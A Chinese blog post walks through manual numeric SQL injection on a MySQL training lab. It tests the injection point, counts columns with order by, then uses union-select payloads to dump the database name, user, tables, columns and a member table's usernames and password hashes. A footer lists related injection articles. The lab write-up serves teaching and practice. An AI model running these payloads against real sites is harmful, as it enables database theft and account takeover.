mysql 数值型注入_Mysql基本注入

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量186 收藏
点赞数
文章标签: mysql 数值型注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28995139/article/details/113158477
版权

实验环境:墨者学院Mysql手工注入漏洞测试靶场

后台源码没有进行任何字符过滤。

首先进入靶场环境

e3408f4dc27acf7f1995506df573d5b6.png

先用admin登陆试试

af793eea71e8fcc0aa6df90cd22c1518.png

果然不行,这时看到用户登录下方有一个停机维护通知,点进去瞅瞅

63f8fc7f6d305b6160213595374fdff4.png

看到这里链接上有id = 1,怀疑这里会有注入点。

判断注入点

先简单判断是不是字符型注入点,使用单引号闭合语句,注释后面的语句

?id = 1'--+

13992ab1507ed3cfc9623eff28135402.png

发现页面有异常,可能不是字符型,再试试数字型注入

?id = 1 and 1 = 1

46f6f00ab1cae26b14833181c66bb8c3.png

发现and 1 = 1没有返回异常,再进一步进行判断

?id = 1 and 1 = 2

bad9b20f052baf22949af3b1a6225f4d.png

页面出现异常,说明这里存在数字型注入点

猜解字段数

发现存在注入点之后使用order by语句判断字段的数目。

?id=1 order by 3

ea7319bbb1c8267a1fc094e89a427dea.png

先试一下是不是3列,发现没有报错,说明至少存在3列,接着猜解。

ddb905a1d11b61cef8c5ffcbe5411d64.png

尝试到5发现报错了,因为字段没有5列,使用order by时无法根据第5列排序,所以出错,由此判断字段数目是4.

联合查询

因为猜解出来的字段数是4,所以联合查询的语句应该这么写?id=1 union select 1,2,3,4,但因为这个语句是成立的,为了让页面爆出我们需要的字段,这里就需要构造一个错误的语句,让数据库报错时返回我们需要的信息。

?id=-1 union select 1,2,3,4

ac252cb5e0dfd3007bc4964e18915cb1.png

可以看到这里页面上爆出了2和3两个数字,说明2和3两个数字对应当前数据表的两个字段会回显到页面上的,这样就可以根据2,3两个回显位查询一些我们需要的信息。

常用的Mysql系统函数有:

version() #MySQL版本

user() #数据库用户名

database() #数据库名

@@datadir #数据库路径

@@version_compile_os #操作系统版本

比如查询当前的数据库名称和当前用户。

?id=-1 union select 1,database(),user(),4

338ca6dc2b92f6541ca2247d97527950.png

这样我们就成功查询到当前数据库,接着找这个数据库里的数据表。

查询数据表

补充1:数据库关键库

这里需要使用到数据库中一个重要的库information_schema,这个库下面的schemadata表中存放着所有数据库的信息,其中schema_name列中保存着所有数据库名,tables表中存放着所有数据表的信息,其中table_schema列存放着数据库名,table_name列存放着数据表名,columns表中存放着所有数据表的所有列信息,其中column_name存放着所有列名,table_name存放着表名。

补充2:concat函数的用法

1.concat(str1,str2)

将多个结果一行返回。如有任何一个参数为NULL ,则返回值为 NULL。

mysql> select 1,2,3;

+---+---+---+

| 1 | 2 | 3 |

+---+---+---+

| 1 | 2 | 3 |

+---+---+---+

1 row in set (0.00 sec)

mysql> select concat(1,2,3);

+---------------+

| concat(1,2,3) |

+---------------+

| 123 |

+---------------+

1 row in set (0.00 sec)

2.concat_ws(separator,str1,str2)

concat_ws是concat()的特殊形式。第一个参数是其它参数的分隔符,分隔符可以是一个字符串,也可以是其它参数。

mysql> select concat_ws('~',1,2,3);

+----------------------+

| concat_ws('~',1,2,3) |

+----------------------+

| 1~2~3 |

+----------------------+

1 row in set (0.00 sec)

3.group_concat完整语法如下,默认使用逗号分隔多个结果:

group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator '分隔符'] )

?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_name = database()

7eda48c4cbe5d3c8c42ec10f4c92c108.png

这样就查询到当前数据库里面有两个数据表,分别为StormGroup_member,notice。

查询列名

?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

6207cd8a62b3cc491f4ec2887358c8ba.png

查询到有这个表有四个字段id,name,password,status。

查询数据

根据上面查询到的四个字段查询数据

?id=-1 union select 1,concat_ws('~',id,name,password,status),3,4 from StormGroup_member

c2b56661efd1b9139e3fb56872fb610e.png

成功查到账号密码,不过这个密码好像是加密的,先进行解密

aea85ca0110b850ef58a887dac830f8c.png

使用这个账号密码登陆试试

e64eb57fea769231fb5f8b96b17ef78a.png

最后尴尬的一幕出现了(/哭)。

赢小孽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【漏洞扫描】——16、Nessus主机安全扫描
Fly_鹏程万里
03-01 2287
Nessus号称是世界上最流行的漏洞扫描程序,全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件,Nessus可同时在本机或远端上遥控,进行系统的漏洞分析扫描。对应渗透测试人员来说,Nessus是必不可少的工具之一。
mysql 数字注入_SQL数字注入(mysql数据库)
weixin_33196555的博客
01-19 562
好像并没有什么特别的东西。用工具进行全站扫描,查看是否有其他页面存在。结果我们一共扫出了三个页面,一个静态页面,两个动态页面。排除静态页面,login.php是我们刚刚看见的后台登陆页面,我们打开这个new_list.php看看。结果我们可以发现,一片空白,也就是说我们在向服务器请求获取页面的时候,页面没有获取成功,也就是差参数。盲猜试试id=1,这个时候发现页面正常显示了。猜测该注入是数字的注...
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 993
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
mysql 数字注入_Mysql数字手工注入
weixin_39584549的博客
01-19 179
本文纯粹整理以前的旧笔记整理出来的文章,将简单粗暴的记录Mysql常用各类注入漏洞的利用和验证方法。01数字注入_注入点确定一个常见的查询功能页面测试 查看PHP源码的核心代码????解释:红色箭头的id就是post请求包里面取参参数黄色部分就是传入数据库的查询语句 明显传入参数完全没有做过滤当加入一个特殊字符进行查询的时候,Mysql查询语句会变成这样selectusername,emailf...
MySQL数字注入
fdhdgsdfdsa的博客
03-05 187
准备知识 sql的增删改查命令(其中and & or(运算符)、order by(排序)、union(合并语句操作符)是重点) 判断是否存在漏洞 用and 1=1和and 1=2来验证判断,如: http://www.xxx.com/sqli/01.php?id=1 and 1=1 返回数据,说明执行成功 http://www.xxx.com/sqli/01.php?id=1 and 1=2 不返回数据,说明数据库后台报错了 用排序间接查找出所有列(专业说法SQL中叫字段) 用order b
SQL注入系列之PHP+Mysql手动注入(一)----数字
热门推荐
fendo
01-01 1万+
常见的几种SQL注入 1.数字 2.字符 3.文本 4.搜索(POST/GET) 5.cookie注入 6.SQL盲注 MySQL报错注入基本流程: Mysql注入步骤 1.判断sql注入 2.猜解表名 3.猜解列名 4.猜解字段内容 5.导出webshell 1.判断sql注入 ○提交单引号' ○and大法和or大法
PHP使用PDO实现mysql注入功能详解
10-15
但这种方法并非万无一失,因为它只适用于简单的字符串参数,对于复杂的SQL结构和数值数据,可能不足以防止注入。 3. **使用预处理语句(Prepared Statements)** 预处理语句是PDO更强大的防注入手段。通过`...
MySQL 面试题-SQL注入篇.docx
09-17
- 数值与字符注入:根据输入参数的类区分,字符注入又分为单引号和双引号注入。 4. SQL注入漏洞的修复: - 输入验证增强:自定义验证规则,限制非法字符,确保输入的安全性。 - 使用参数化查询和预编译...
MySQL 教程 开发文档 从基础到精通
07-25
MySQL是一种广泛使用的开源关系数据库,尤其在Web应用程序中表现出色。关系数据库管理系统(RDBMS)如MySQL,利用表格来组织和管理数据,确保数据的一致性和可靠性。 在开始学习MySQL之前,了解基本的数据库概念...
php随机取mysql记录方法小结
10-24
如果你想随机获取多条记录,只需改变`LIMIT`后面的数值即可,如`LIMIT 5`将获取5条随机记录。 ### 方法二:计算随机位置和范围 这种方法不直接使用`ORDER BY RAND()`,而是先获取表的总记录数,然后生成一个随机数...
MySQL面试题:从基础到进阶全面解析
10-20
MySQL是世界上最受欢迎的开源关系数据库管理系统之一,其主要用途在于存储、管理和检索应用程序的数据。在面试中,理解和掌握MySQL的基础知识、高级特性和拓展功能是至关重要的。 基础篇的知识点主要包括: 1. ...
MySQL联合注入之数字注入
m0_50211409的博客
03-26 604
SQL注入原理 SQL注入攻击是网站未对sql语句,完全校验通过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击。一切与数据库存在交互的地方都是有可能存在注入漏洞的。 这难度程度是比较简单的,但是需要一些SQL语句基础。 测试环境:东塔靶场 https://labs.do-ta.com/index/course/detail/id/51 测试工具:hackebay 1.判断是否存在注入 我们可以在url的id=1后添加一个单引号(‘)执行,看语句是否会带入查询 如
SQL注入原理-数值注入
T1ngSh0w的博客
09-12 1551
SQL注入原理-数值注入
MYSQL注入
loser的博客
07-23 179
一、显错注入 需要注意的是,若是想通过匹配库爆表,需要将库名转换成哈希值或者是二进制,否则有些时候会被转义从而报错 一个数据库 information_schema 第一张表 schemate schema_name 第二张表 tables table_name table_schema 第三张表 columns column_name table_name table_schema table_schema: 记录数据库名 table_name: 记录数据表名 1.判断列数 order by
Mysql注入
hhhshd的博客
11-08 486
** 一、SQL注入概念 ** SQL注入是表示指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的回显,达到执行恶意SQL ** 二、SQL注入的思路 ** 判断sql注入的类,通常分为了数字和字符 拆解在
mysql注入
qq_35856778的博客
09-22 97
注入
SQL注入攻防手册:MySQL与MSSQL函数与技巧
1. **MySQL注入原理**:当用户输入的数据未经适当过滤或转义,直接拼接到SQL语句中执行时,就可能造成注入。攻击者可以通过尝试不同的参数和表达式来探测数据库的结构和信息。 2. **测试参数与类**:确定注入参数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值